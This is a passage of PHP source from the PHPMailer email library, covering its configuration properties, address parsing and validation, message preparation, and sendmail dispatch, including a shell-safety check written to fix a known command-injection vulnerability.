createHeader() doesn't fold in. * * @var string */ protected $mailHeader = ''; /** * Word-wrap the message body to this number of chars. * Set to 0 to not wrap. A useful value here is 78, for RFC2822 section 2.1.1 compliance. * * @see static::STD_LINE_LENGTH * * @var int */ public $WordWrap = 0; /** * Which method to use to send mail. * Options: "mail", "sendmail", or "smtp". * * @var string */ public $Mailer = 'mail'; /** * The path to the sendmail program. * * @var string */ public $Sendmail = '/usr/sbin/sendmail'; /** * Whether mail() uses a fully sendmail-compatible MTA. * One which supports sendmail's "-oi -f" options. * * @var bool */ public $UseSendmailOptions = true; /** * The email address that a reading confirmation should be sent to, also known as read receipt. * * @var string */ public $ConfirmReadingTo = ''; /** * The hostname to use in the Message-ID header and as default HELO string. * If empty, PHPMailer attempts to find one with, in order, * $_SERVER['SERVER_NAME'], gethostname(), php_uname('n'), or the value * 'localhost.localdomain'. * * @see PHPMailer::$Helo * * @var string */ public $Hostname = ''; /** * An ID to be used in the Message-ID header. * If empty, a unique id will be generated. * You can set your own, but it must be in the format "", * as defined in RFC5322 section 3.6.4 or it will be ignored. * * @see https://tools.ietf.org/html/rfc5322#section-3.6.4 * * @var string */ public $MessageID = ''; /** * The message Date to be used in the Date header. * If empty, the current date will be added. * * @var string */ public $MessageDate = ''; /** * SMTP hosts. * Either a single hostname or multiple semicolon-delimited hostnames. * You can also specify a different port * for each host by using this format: [hostname:port] * (e.g. "smtp1.example.com:25;smtp2.example.com"). * You can also specify encryption type, for example: * (e.g. "tls://smtp1.example.com:587;ssl://smtp2.example.com:465"). * Hosts will be tried in order. * * @var string */ public $Host = 'localhost'; /** * The default SMTP server port. * * @var int */ public $Port = 25; /** * The SMTP HELO/EHLO name used for the SMTP connection. * Default is $Hostname. If $Hostname is empty, PHPMailer attempts to find * one with the same method described above for $Hostname. * * @see PHPMailer::$Hostname * * @var string */ public $Helo = ''; /** * What kind of encryption to use on the SMTP connection. * Options: '', static::ENCRYPTION_STARTTLS, or static::ENCRYPTION_SMTPS. * * @var string */ public $SMTPSecure = ''; /** * Whether to enable TLS encryption automatically if a server supports it, * even if `SMTPSecure` is not set to 'tls'. * Be aware that in PHP >= 5.6 this requires that the server's certificates are valid. * * @var bool */ public $SMTPAutoTLS = true; /** * Whether to use SMTP authentication. * Uses the Username and Password properties. * * @see PHPMailer::$Username * @see PHPMailer::$Password * * @var bool */ public $SMTPAuth = false; /** * Options array passed to stream_context_create when connecting via SMTP. * * @var array */ public $SMTPOptions = []; /** * SMTP username. * * @var string */ public $Username = ''; /** * SMTP password. * * @var string */ public $Password = ''; /** * SMTP auth type. * Options are CRAM-MD5, LOGIN, PLAIN, XOAUTH2, attempted in that order if not specified. * * @var string */ public $AuthType = ''; /** * An instance of the PHPMailer OAuth class. * * @var OAuth */ protected $oauth; /** * The SMTP server timeout in seconds. * Default of 5 minutes (300sec) is from RFC2821 section 4.5.3.2. * * @var int */ public $Timeout = 300; /** * Comma separated list of DSN notifications * 'NEVER' under no circumstances a DSN must be returned to the sender. * If you use NEVER all other notifications will be ignored. * 'SUCCESS' will notify you when your mail has arrived at its destination. * 'FAILURE' will arrive if an error occurred during delivery. * 'DELAY' will notify you if there is an unusual delay in delivery, but the actual * delivery's outcome (success or failure) is not yet decided. * * @see https://tools.ietf.org/html/rfc3461 See section 4.1 for more information about NOTIFY */ public $dsn = ''; /** * SMTP class debug output mode. * Debug output level. * Options: * * SMTP::DEBUG_OFF: No output * * SMTP::DEBUG_CLIENT: Client messages * * SMTP::DEBUG_SERVER: Client and server messages * * SMTP::DEBUG_CONNECTION: As SERVER plus connection status * * SMTP::DEBUG_LOWLEVEL: Noisy, low-level data output, rarely needed * * @see SMTP::$do_debug * * @var int */ public $SMTPDebug = 0; /** * How to handle debug output. * Options: * * `echo` Output plain-text as-is, appropriate for CLI * * `html` Output escaped, line breaks converted to `
`, appropriate for browser output * * `error_log` Output to error log as configured in php.ini * By default PHPMailer will use `echo` if run from a `cli` or `cli-server` SAPI, `html` otherwise. * Alternatively, you can provide a callable expecting two params: a message string and the debug level: * * ```php * $mail->Debugoutput = function($str, $level) {echo "debug level $level; message: $str";}; * ``` * * Alternatively, you can pass in an instance of a PSR-3 compatible logger, though only `debug` * level output is used: * * ```php * $mail->Debugoutput = new myPsr3Logger; * ``` * * @see SMTP::$Debugoutput * * @var string|callable|\Psr\Log\LoggerInterface */ public $Debugoutput = 'echo'; /** * Whether to keep SMTP connection open after each message. * If this is set to true then to close the connection * requires an explicit call to smtpClose(). * * @var bool */ public $SMTPKeepAlive = false; /** * Whether to split multiple to addresses into multiple messages * or send them all in one message. * Only supported in `mail` and `sendmail` transports, not in SMTP. * * @var bool */ public $SingleTo = false; /** * Storage for addresses when SingleTo is enabled. * * @var array */ protected $SingleToArray = []; /** * Whether to generate VERP addresses on send. * Only applicable when sending via SMTP. * * @see https://en.wikipedia.org/wiki/Variable_envelope_return_path * @see http://www.postfix.org/VERP_README.html Postfix VERP info * * @var bool */ public $do_verp = false; /** * Whether to allow sending messages with an empty body. * * @var bool */ public $AllowEmpty = false; /** * DKIM selector. * * @var string */ public $DKIM_selector = ''; /** * DKIM Identity. * Usually the email address used as the source of the email. * * @var string */ public $DKIM_identity = ''; /** * DKIM passphrase. * Used if your key is encrypted. * * @var string */ public $DKIM_passphrase = ''; /** * DKIM signing domain name. * * @example 'example.com' * * @var string */ public $DKIM_domain = ''; /** * DKIM Copy header field values for diagnostic use. * * @var bool */ public $DKIM_copyHeaderFields = true; /** * DKIM Extra signing headers. * * @example ['List-Unsubscribe', 'List-Help'] * * @var array */ public $DKIM_extraHeaders = []; /** * DKIM private key file path. * * @var string */ public $DKIM_private = ''; /** * DKIM private key string. * * If set, takes precedence over `$DKIM_private`. * * @var string */ public $DKIM_private_string = ''; /** * Callback Action function name. * * The function that handles the result of the send email action. * It is called out by send() for each email sent. * * Value can be any php callable: http://www.php.net/is_callable * * Parameters: * bool $result result of the send action * array $to email addresses of the recipients * array $cc cc email addresses * array $bcc bcc email addresses * string $subject the subject * string $body the email body * string $from email address of sender * string $extra extra information of possible use * "smtp_transaction_id' => last smtp transaction id * * @var string */ public $action_function = ''; /** * What to put in the X-Mailer header. * Options: An empty string for PHPMailer default, whitespace/null for none, or a string to use. * * @var string|null */ public $XMailer = ''; /** * Which validator to use by default when validating email addresses. * May be a callable to inject your own validator, but there are several built-in validators. * The default validator uses PHP's FILTER_VALIDATE_EMAIL filter_var option. * * @see PHPMailer::validateAddress() * * @var string|callable */ public static $validator = 'php'; /** * An instance of the SMTP sender class. * * @var SMTP */ protected $smtp; /** * The array of 'to' names and addresses. * * @var array */ protected $to = []; /** * The array of 'cc' names and addresses. * * @var array */ protected $cc = []; /** * The array of 'bcc' names and addresses. * * @var array */ protected $bcc = []; /** * The array of reply-to names and addresses. * * @var array */ protected $ReplyTo = []; /** * An array of all kinds of addresses. * Includes all of $to, $cc, $bcc. * * @see PHPMailer::$to * @see PHPMailer::$cc * @see PHPMailer::$bcc * * @var array */ protected $all_recipients = []; /** * An array of names and addresses queued for validation. * In send(), valid and non duplicate entries are moved to $all_recipients * and one of $to, $cc, or $bcc. * This array is used only for addresses with IDN. * * @see PHPMailer::$to * @see PHPMailer::$cc * @see PHPMailer::$bcc * @see PHPMailer::$all_recipients * * @var array */ protected $RecipientsQueue = []; /** * An array of reply-to names and addresses queued for validation. * In send(), valid and non duplicate entries are moved to $ReplyTo. * This array is used only for addresses with IDN. * * @see PHPMailer::$ReplyTo * * @var array */ protected $ReplyToQueue = []; /** * The array of attachments. * * @var array */ protected $attachment = []; /** * The array of custom headers. * * @var array */ protected $CustomHeader = []; /** * The most recent Message-ID (including angular brackets). * * @var string */ protected $lastMessageID = ''; /** * The message's MIME type. * * @var string */ protected $message_type = ''; /** * The array of MIME boundary strings. * * @var array */ protected $boundary = []; /** * The array of available languages. * * @var array */ protected $language = []; /** * The number of errors encountered. * * @var int */ protected $error_count = 0; /** * The S/MIME certificate file path. * * @var string */ protected $sign_cert_file = ''; /** * The S/MIME key file path. * * @var string */ protected $sign_key_file = ''; /** * The optional S/MIME extra certificates ("CA Chain") file path. * * @var string */ protected $sign_extracerts_file = ''; /** * The S/MIME password for the key. * Used only if the key is encrypted. * * @var string */ protected $sign_key_pass = ''; /** * Whether to throw exceptions for errors. * * @var bool */ protected $exceptions = false; /** * Unique ID used for message ID and boundaries. * * @var string */ protected $uniqueid = ''; /** * The PHPMailer Version number. * * @var string */ const VERSION = '6.1.4'; /** * Error severity: message only, continue processing. * * @var int */ const STOP_MESSAGE = 0; /** * Error severity: message, likely ok to continue processing. * * @var int */ const STOP_CONTINUE = 1; /** * Error severity: message, plus full stop, critical error reached. * * @var int */ const STOP_CRITICAL = 2; /** * SMTP RFC standard line ending. * * @var string */ protected static $LE = "\r\n"; /** * The maximum line length supported by mail(). * * Background: mail() will sometimes corrupt messages * with headers headers longer than 65 chars, see #818. * * @var int */ const MAIL_MAX_LINE_LENGTH = 63; /** * The maximum line length allowed by RFC 2822 section 2.1.1. * * @var int */ const MAX_LINE_LENGTH = 998; /** * The lower maximum line length allowed by RFC 2822 section 2.1.1. * This length does NOT include the line break * 76 means that lines will be 77 or 78 chars depending on whether * the line break format is LF or CRLF; both are valid. * * @var int */ const STD_LINE_LENGTH = 76; /** * Constructor. * * @param bool $exceptions Should we throw external exceptions? */ public function __construct($exceptions = null) { if (null !== $exceptions) { $this->exceptions = (bool) $exceptions; } //Pick an appropriate debug output format automatically $this->Debugoutput = (strpos(PHP_SAPI, 'cli') !== false ? 'echo' : 'html'); } /** * Destructor. */ public function __destruct() { //Close any open SMTP connection nicely $this->smtpClose(); } /** * Call mail() in a safe_mode-aware fashion. * Also, unless sendmail_path points to sendmail (or something that * claims to be sendmail), don't pass params (not a perfect fix, * but it will do). * * @param string $to To * @param string $subject Subject * @param string $body Message Body * @param string $header Additional Header(s) * @param string|null $params Params * * @return bool */ private function mailPassthru($to, $subject, $body, $header, $params) { //Check overloading of mail function to avoid double-encoding if (ini_get('mbstring.func_overload') & 1) { $subject = $this->secureHeader($subject); } else { $subject = $this->encodeHeader($this->secureHeader($subject)); } //Calling mail() with null params breaks if (!$this->UseSendmailOptions || null === $params) { $result = @mail($to, $subject, $body, $header); } else { $result = @mail($to, $subject, $body, $header, $params); } return $result; } /** * Output debugging info via user-defined method. * Only generates output if SMTP debug output is enabled (@see SMTP::$do_debug). * * @see PHPMailer::$Debugoutput * @see PHPMailer::$SMTPDebug * * @param string $str */ protected function edebug($str) { if ($this->SMTPDebug <= 0) { return; } //Is this a PSR-3 logger? if ($this->Debugoutput instanceof \Psr\Log\LoggerInterface) { $this->Debugoutput->debug($str); return; } //Avoid clash with built-in function names if (is_callable($this->Debugoutput) && !in_array($this->Debugoutput, ['error_log', 'html', 'echo'])) { call_user_func($this->Debugoutput, $str, $this->SMTPDebug); return; } switch ($this->Debugoutput) { case 'error_log': //Don't output, just log error_log($str); break; case 'html': //Cleans up output a bit for a better looking, HTML-safe output echo htmlentities( preg_replace('/[\r\n]+/', '', $str), ENT_QUOTES, 'UTF-8' ), "
\n"; break; case 'echo': default: //Normalize line breaks $str = preg_replace('/\r\n|\r/m', "\n", $str); echo gmdate('Y-m-d H:i:s'), "\t", //Trim trailing space trim( //Indent for readability, except for trailing break str_replace( "\n", "\n \t ", trim($str) ) ), "\n"; } } /** * Sets message type to HTML or plain. * * @param bool $isHtml True for HTML mode */ public function isHTML($isHtml = true) { if ($isHtml) { $this->ContentType = static::CONTENT_TYPE_TEXT_HTML; } else { $this->ContentType = static::CONTENT_TYPE_PLAINTEXT; } } /** * Send messages using SMTP. */ public function isSMTP() { $this->Mailer = 'smtp'; } /** * Send messages using PHP's mail() function. */ public function isMail() { $this->Mailer = 'mail'; } /** * Send messages using $Sendmail. */ public function isSendmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (false === stripos($ini_sendmail_path, 'sendmail')) { $this->Sendmail = '/usr/sbin/sendmail'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'sendmail'; } /** * Send messages using qmail. */ public function isQmail() { $ini_sendmail_path = ini_get('sendmail_path'); if (false === stripos($ini_sendmail_path, 'qmail')) { $this->Sendmail = '/var/qmail/bin/qmail-inject'; } else { $this->Sendmail = $ini_sendmail_path; } $this->Mailer = 'qmail'; } /** * Add a "To" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addAddress($address, $name = '') { return $this->addOrEnqueueAnAddress('to', $address, $name); } /** * Add a "CC" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addCC($address, $name = '') { return $this->addOrEnqueueAnAddress('cc', $address, $name); } /** * Add a "BCC" address. * * @param string $address The email address to send to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addBCC($address, $name = '') { return $this->addOrEnqueueAnAddress('bcc', $address, $name); } /** * Add a "Reply-To" address. * * @param string $address The email address to reply to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ public function addReplyTo($address, $name = '') { return $this->addOrEnqueueAnAddress('Reply-To', $address, $name); } /** * Add an address to one of the recipient arrays or to the ReplyTo array. Because PHPMailer * can't validate addresses with an IDN without knowing the PHPMailer::$CharSet (that can still * be modified after calling this function), addition of such addresses is delayed until send(). * Addresses that have been added already return false, but do not throw exceptions. * * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo' * @param string $address The email address to send, resp. to reply to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ protected function addOrEnqueueAnAddress($kind, $address, $name) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim $pos = strrpos($address, '@'); if (false === $pos) { // At-sign is missing. $error_message = sprintf( '%s (%s): %s', $this->lang('invalid_address'), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } $params = [$kind, $address, $name]; // Enqueue addresses with IDN until we know the PHPMailer::$CharSet. if (static::idnSupported() && $this->has8bitChars(substr($address, ++$pos))) { if ('Reply-To' !== $kind) { if (!array_key_exists($address, $this->RecipientsQueue)) { $this->RecipientsQueue[$address] = $params; return true; } } elseif (!array_key_exists($address, $this->ReplyToQueue)) { $this->ReplyToQueue[$address] = $params; return true; } return false; } // Immediately add standard addresses without IDN. return call_user_func_array([$this, 'addAnAddress'], $params); } /** * Add an address to one of the recipient arrays or to the ReplyTo array. * Addresses that have been added already return false, but do not throw exceptions. * * @param string $kind One of 'to', 'cc', 'bcc', or 'ReplyTo' * @param string $address The email address to send, resp. to reply to * @param string $name * * @throws Exception * * @return bool true on success, false if address already used or invalid in some way */ protected function addAnAddress($kind, $address, $name = '') { if (!in_array($kind, ['to', 'cc', 'bcc', 'Reply-To'])) { $error_message = sprintf( '%s: %s', $this->lang('Invalid recipient kind'), $kind ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if (!static::validateAddress($address)) { $error_message = sprintf( '%s (%s): %s', $this->lang('invalid_address'), $kind, $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } if ('Reply-To' !== $kind) { if (!array_key_exists(strtolower($address), $this->all_recipients)) { $this->{$kind}[] = [$address, $name]; $this->all_recipients[strtolower($address)] = true; return true; } } elseif (!array_key_exists(strtolower($address), $this->ReplyTo)) { $this->ReplyTo[strtolower($address)] = [$address, $name]; return true; } return false; } /** * Parse and validate a string containing one or more RFC822-style comma-separated email addresses * of the form "display name
" into an array of name/address pairs. * Uses the imap_rfc822_parse_adrlist function if the IMAP extension is available. * Note that quotes in the name part are removed. * * @see http://www.andrew.cmu.edu/user/agreen1/testing/mrbs/web/Mail/RFC822.php A more careful implementation * * @param string $addrstr The address list string * @param bool $useimap Whether to use the IMAP extension to parse the list * * @return array */ public static function parseAddresses($addrstr, $useimap = true) { $addresses = []; if ($useimap && function_exists('imap_rfc822_parse_adrlist')) { //Use this built-in parser if it's available $list = imap_rfc822_parse_adrlist($addrstr, ''); foreach ($list as $address) { if (('.SYNTAX-ERROR.' !== $address->host) && static::validateAddress( $address->mailbox . '@' . $address->host )) { $addresses[] = [ 'name' => (property_exists($address, 'personal') ? $address->personal : ''), 'address' => $address->mailbox . '@' . $address->host, ]; } } } else { //Use this simpler parser $list = explode(',', $addrstr); foreach ($list as $address) { $address = trim($address); //Is there a separate name part? if (strpos($address, '<') === false) { //No separate name, just use the whole thing if (static::validateAddress($address)) { $addresses[] = [ 'name' => '', 'address' => $address, ]; } } else { list($name, $email) = explode('<', $address); $email = trim(str_replace('>', '', $email)); if (static::validateAddress($email)) { $addresses[] = [ 'name' => trim(str_replace(['"', "'"], '', $name)), 'address' => $email, ]; } } } } return $addresses; } /** * Set the From and FromName properties. * * @param string $address * @param string $name * @param bool $auto Whether to also set the Sender address, defaults to true * * @throws Exception * * @return bool */ public function setFrom($address, $name = '', $auto = true) { $address = trim($address); $name = trim(preg_replace('/[\r\n]+/', '', $name)); //Strip breaks and trim // Don't validate now addresses with IDN. Will be done in send(). $pos = strrpos($address, '@'); if ((false === $pos) || ((!$this->has8bitChars(substr($address, ++$pos)) || !static::idnSupported()) && !static::validateAddress($address)) ) { $error_message = sprintf( '%s (From): %s', $this->lang('invalid_address'), $address ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } $this->From = $address; $this->FromName = $name; if ($auto && empty($this->Sender)) { $this->Sender = $address; } return true; } /** * Return the Message-ID header of the last email. * Technically this is the value from the last time the headers were created, * but it's also the message ID of the last sent message except in * pathological cases. * * @return string */ public function getLastMessageID() { return $this->lastMessageID; } /** * Check that a string looks like an email address. * Validation patterns supported: * * `auto` Pick best pattern automatically; * * `pcre8` Use the squiloople.com pattern, requires PCRE > 8.0; * * `pcre` Use old PCRE implementation; * * `php` Use PHP built-in FILTER_VALIDATE_EMAIL; * * `html5` Use the pattern given by the HTML5 spec for 'email' type form input elements. * * `noregex` Don't use a regex: super fast, really dumb. * Alternatively you may pass in a callable to inject your own validator, for example: * * ```php * PHPMailer::validateAddress('user@example.com', function($address) { * return (strpos($address, '@') !== false); * }); * ``` * * You can also set the PHPMailer::$validator static to a callable, allowing built-in methods to use your validator. * * @param string $address The email address to check * @param string|callable $patternselect Which pattern to use * * @return bool */ public static function validateAddress($address, $patternselect = null) { if (null === $patternselect) { $patternselect = static::$validator; } if (is_callable($patternselect)) { return $patternselect($address); } //Reject line breaks in addresses; it's valid RFC5322, but not RFC5321 if (strpos($address, "\n") !== false || strpos($address, "\r") !== false) { return false; } switch ($patternselect) { case 'pcre': //Kept for BC case 'pcre8': /* * A more complex and more permissive version of the RFC5322 regex on which FILTER_VALIDATE_EMAIL * is based. * In addition to the addresses allowed by filter_var, also permits: * * dotless domains: `a@b` * * comments: `1234 @ local(blah) .machine .example` * * quoted elements: `'"test blah"@example.org'` * * numeric TLDs: `a@b.123` * * unbracketed IPv4 literals: `a@192.168.0.1` * * IPv6 literals: 'first.last@[IPv6:a1::]' * Not all of these will necessarily work for sending! * * @see http://squiloople.com/2009/12/20/email-address-validation/ * @copyright 2009-2010 Michael Rushton * Feel free to use and redistribute this code. But please keep this copyright notice. */ return (bool) preg_match( '/^(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){255,})(?!(?>(?1)"?(?>\\\[ -~]|[^"])"?(?1)){65,}@)' . '((?>(?>(?>((?>(?>(?>\x0D\x0A)?[\t ])+|(?>[\t ]*\x0D\x0A)?[\t ]+)?)(\((?>(?2)' . '(?>[\x01-\x08\x0B\x0C\x0E-\'*-\[\]-\x7F]|\\\[\x00-\x7F]|(?3)))*(?2)\)))+(?2))|(?2))?)' . '([!#-\'*+\/-9=?^-~-]+|"(?>(?2)(?>[\x01-\x08\x0B\x0C\x0E-!#-\[\]-\x7F]|\\\[\x00-\x7F]))*' . '(?2)")(?>(?1)\.(?1)(?4))*(?1)@(?!(?1)[a-z0-9-]{64,})(?1)(?>([a-z0-9](?>[a-z0-9-]*[a-z0-9])?)' . '(?>(?1)\.(?!(?1)[a-z0-9-]{64,})(?1)(?5)){0,126}|\[(?:(?>IPv6:(?>([a-f0-9]{1,4})(?>:(?6)){7}' . '|(?!(?:.*[a-f0-9][:\]]){8,})((?6)(?>:(?6)){0,6})?::(?7)?))|(?>(?>IPv6:(?>(?6)(?>:(?6)){5}:' . '|(?!(?:.*[a-f0-9]:){6,})(?8)?::(?>((?6)(?>:(?6)){0,4}):)?))?(25[0-5]|2[0-4][0-9]|1[0-9]{2}' . '|[1-9]?[0-9])(?>\.(?9)){3}))\])(?1)$/isD', $address ); case 'html5': /* * This is the pattern used in the HTML5 spec for validation of 'email' type form input elements. * * @see http://www.whatwg.org/specs/web-apps/current-work/#e-mail-state-(type=email) */ return (bool) preg_match( '/^[a-zA-Z0-9.!#$%&\'*+\/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}' . '[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/sD', $address ); case 'php': default: return filter_var($address, FILTER_VALIDATE_EMAIL) !== false; } } /** * Tells whether IDNs (Internationalized Domain Names) are supported or not. This requires the * `intl` and `mbstring` PHP extensions. * * @return bool `true` if required functions for IDN support are present */ public static function idnSupported() { return function_exists('idn_to_ascii') && function_exists('mb_convert_encoding'); } /** * Converts IDN in given email address to its ASCII form, also known as punycode, if possible. * Important: Address must be passed in same encoding as currently set in PHPMailer::$CharSet. * This function silently returns unmodified address if: * - No conversion is necessary (i.e. domain name is not an IDN, or is already in ASCII form) * - Conversion to punycode is impossible (e.g. required PHP functions are not available) * or fails for any reason (e.g. domain contains characters not allowed in an IDN). * * @see PHPMailer::$CharSet * * @param string $address The email address to convert * * @return string The encoded address in ASCII form */ public function punyencodeAddress($address) { // Verify we have required functions, CharSet, and at-sign. $pos = strrpos($address, '@'); if (!empty($this->CharSet) && false !== $pos && static::idnSupported() ) { $domain = substr($address, ++$pos); // Verify CharSet string is a valid one, and domain properly encoded in this CharSet. if ($this->has8bitChars($domain) && @mb_check_encoding($domain, $this->CharSet)) { $domain = mb_convert_encoding($domain, 'UTF-8', $this->CharSet); //Ignore IDE complaints about this line - method signature changed in PHP 5.4 $errorcode = 0; if (defined('INTL_IDNA_VARIANT_UTS46')) { $punycode = idn_to_ascii($domain, $errorcode, INTL_IDNA_VARIANT_UTS46); } elseif (defined('INTL_IDNA_VARIANT_2003')) { $punycode = idn_to_ascii($domain, $errorcode, INTL_IDNA_VARIANT_2003); } else { $punycode = idn_to_ascii($domain, $errorcode); } if (false !== $punycode) { return substr($address, 0, $pos) . $punycode; } } } return $address; } /** * Create a message and send it. * Uses the sending method specified by $Mailer. * * @throws Exception * * @return bool false on error - See the ErrorInfo property for details of the error */ public function send() { try { if (!$this->preSend()) { return false; } return $this->postSend(); } catch (Exception $exc) { $this->mailHeader = ''; $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } /** * Prepare a message for sending. * * @throws Exception * * @return bool */ public function preSend() { if ('smtp' === $this->Mailer || ('mail' === $this->Mailer && stripos(PHP_OS, 'WIN') === 0) ) { //SMTP mandates RFC-compliant line endings //and it's also used with mail() on Windows static::setLE("\r\n"); } else { //Maintain backward compatibility with legacy Linux command line mailers static::setLE(PHP_EOL); } //Check for buggy PHP versions that add a header with an incorrect line break if ('mail' === $this->Mailer && ((PHP_VERSION_ID >= 70000 && PHP_VERSION_ID < 70017) || (PHP_VERSION_ID >= 70100 && PHP_VERSION_ID < 70103)) && ini_get('mail.add_x_header') === '1' && stripos(PHP_OS, 'WIN') === 0 ) { trigger_error( 'Your version of PHP is affected by a bug that may result in corrupted messages.' . ' To fix it, switch to sending using SMTP, disable the mail.add_x_header option in' . ' your php.ini, switch to MacOS or Linux, or upgrade your PHP to version 7.0.17+ or 7.1.3+.', E_USER_WARNING ); } try { $this->error_count = 0; // Reset errors $this->mailHeader = ''; // Dequeue recipient and Reply-To addresses with IDN foreach (array_merge($this->RecipientsQueue, $this->ReplyToQueue) as $params) { $params[1] = $this->punyencodeAddress($params[1]); call_user_func_array([$this, 'addAnAddress'], $params); } if (count($this->to) + count($this->cc) + count($this->bcc) < 1) { throw new Exception($this->lang('provide_address'), self::STOP_CRITICAL); } // Validate From, Sender, and ConfirmReadingTo addresses foreach (['From', 'Sender', 'ConfirmReadingTo'] as $address_kind) { $this->$address_kind = trim($this->$address_kind); if (empty($this->$address_kind)) { continue; } $this->$address_kind = $this->punyencodeAddress($this->$address_kind); if (!static::validateAddress($this->$address_kind)) { $error_message = sprintf( '%s (%s): %s', $this->lang('invalid_address'), $address_kind, $this->$address_kind ); $this->setError($error_message); $this->edebug($error_message); if ($this->exceptions) { throw new Exception($error_message); } return false; } } // Set whether the message is multipart/alternative if ($this->alternativeExists()) { $this->ContentType = static::CONTENT_TYPE_MULTIPART_ALTERNATIVE; } $this->setMessageType(); // Refuse to send an empty message unless we are specifically allowing it if (!$this->AllowEmpty && empty($this->Body)) { throw new Exception($this->lang('empty_message'), self::STOP_CRITICAL); } //Trim subject consistently $this->Subject = trim($this->Subject); // Create body before headers in case body makes changes to headers (e.g. altering transfer encoding) $this->MIMEHeader = ''; $this->MIMEBody = $this->createBody(); // createBody may have added some headers, so retain them $tempheaders = $this->MIMEHeader; $this->MIMEHeader = $this->createHeader(); $this->MIMEHeader .= $tempheaders; // To capture the complete message when using mail(), create // an extra header list which createHeader() doesn't fold in if ('mail' === $this->Mailer) { if (count($this->to) > 0) { $this->mailHeader .= $this->addrAppend('To', $this->to); } else { $this->mailHeader .= $this->headerLine('To', 'undisclosed-recipients:;'); } $this->mailHeader .= $this->headerLine( 'Subject', $this->encodeHeader($this->secureHeader($this->Subject)) ); } // Sign with DKIM if enabled if (!empty($this->DKIM_domain) && !empty($this->DKIM_selector) && (!empty($this->DKIM_private_string) || (!empty($this->DKIM_private) && static::isPermittedPath($this->DKIM_private) && file_exists($this->DKIM_private) ) ) ) { $header_dkim = $this->DKIM_Add( $this->MIMEHeader . $this->mailHeader, $this->encodeHeader($this->secureHeader($this->Subject)), $this->MIMEBody ); $this->MIMEHeader = rtrim($this->MIMEHeader, "\r\n ") . static::$LE . static::normalizeBreaks($header_dkim) . static::$LE; } return true; } catch (Exception $exc) { $this->setError($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } } /** * Actually send a message via the selected mechanism. * * @throws Exception * * @return bool */ public function postSend() { try { // Choose the mailer and send through it switch ($this->Mailer) { case 'sendmail': case 'qmail': return $this->sendmailSend($this->MIMEHeader, $this->MIMEBody); case 'smtp': return $this->smtpSend($this->MIMEHeader, $this->MIMEBody); case 'mail': return $this->mailSend($this->MIMEHeader, $this->MIMEBody); default: $sendMethod = $this->Mailer . 'Send'; if (method_exists($this, $sendMethod)) { return $this->$sendMethod($this->MIMEHeader, $this->MIMEBody); } return $this->mailSend($this->MIMEHeader, $this->MIMEBody); } } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } } return false; } /** * Send mail using the $Sendmail program. * * @see PHPMailer::$Sendmail * * @param string $header The message headers * @param string $body The message body * * @throws Exception * * @return bool */ protected function sendmailSend($header, $body) { $header = rtrim($header, "\r\n ") . static::$LE . static::$LE; // CVE-2016-10033, CVE-2016-10045: Don't pass -f if characters will be escaped. if (!empty($this->Sender) && self::isShellSafe($this->Sender)) { if ('qmail' === $this->Mailer) { $sendmailFmt = '%s -f%s'; } else { $sendmailFmt = '%s -oi -f%s -t'; } } elseif ('qmail' === $this->Mailer) { $sendmailFmt = '%s'; } else { $sendmailFmt = '%s -oi -t'; } $sendmail = sprintf($sendmailFmt, escapeshellcmd($this->Sendmail), $this->Sender); if ($this->SingleTo) { foreach ($this->SingleToArray as $toAddr) { $mail = @popen($sendmail, 'w'); if (!$mail) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fwrite($mail, 'To: ' . $toAddr . "\n"); fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $this->doCallback( ($result === 0), [$toAddr], $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); if (0 !== $result) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } } else { $mail = @popen($sendmail, 'w'); if (!$mail) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } fwrite($mail, $header); fwrite($mail, $body); $result = pclose($mail); $this->doCallback( ($result === 0), $this->to, $this->cc, $this->bcc, $this->Subject, $body, $this->From, [] ); if (0 !== $result) { throw new Exception($this->lang('execute') . $this->Sendmail, self::STOP_CRITICAL); } } return true; } /** * Fix CVE-2016-10033 and CVE-2016-10045 by disallowing potentially unsafe shell characters. * Note that escapeshellarg and escapeshellcmd are inadequate for our purposes, especially on Windows. * * @see https://github.com/PHPMailer/PHPMailer/issues/924 CVE-2016-10045 bug report * * @param string $string The string to be validated * * @return bool */ protected static function isShellSafe($string) { // Future-proof if (escapeshellcmd($string) !== $string || !in_array(escapeshellarg($string), ["'$string'", "\"$string\""]) ) { return false; } $length = strlen($string); for ($i = 0; $i < $length; ++$i) { $c = $string[$i]; // All other characters have a special meaning in at least one common shell, including = and +. // Full stop (.) has a special meaning in cmd.exe, but its impact should be negligible here. // Note that this does permit non-Latin alphanumeric characters based on the current locale. if (!ctype_alnum($c) && strpos('@_-.', $c) === false) { return false; } } return true; } /** * Check whether a file path is of a permitted type. * Used to reject URLs and phar files from functions that access local file paths, * such as addAttachment. * * @param string $path A relative or absolute path to a file * * @return bool 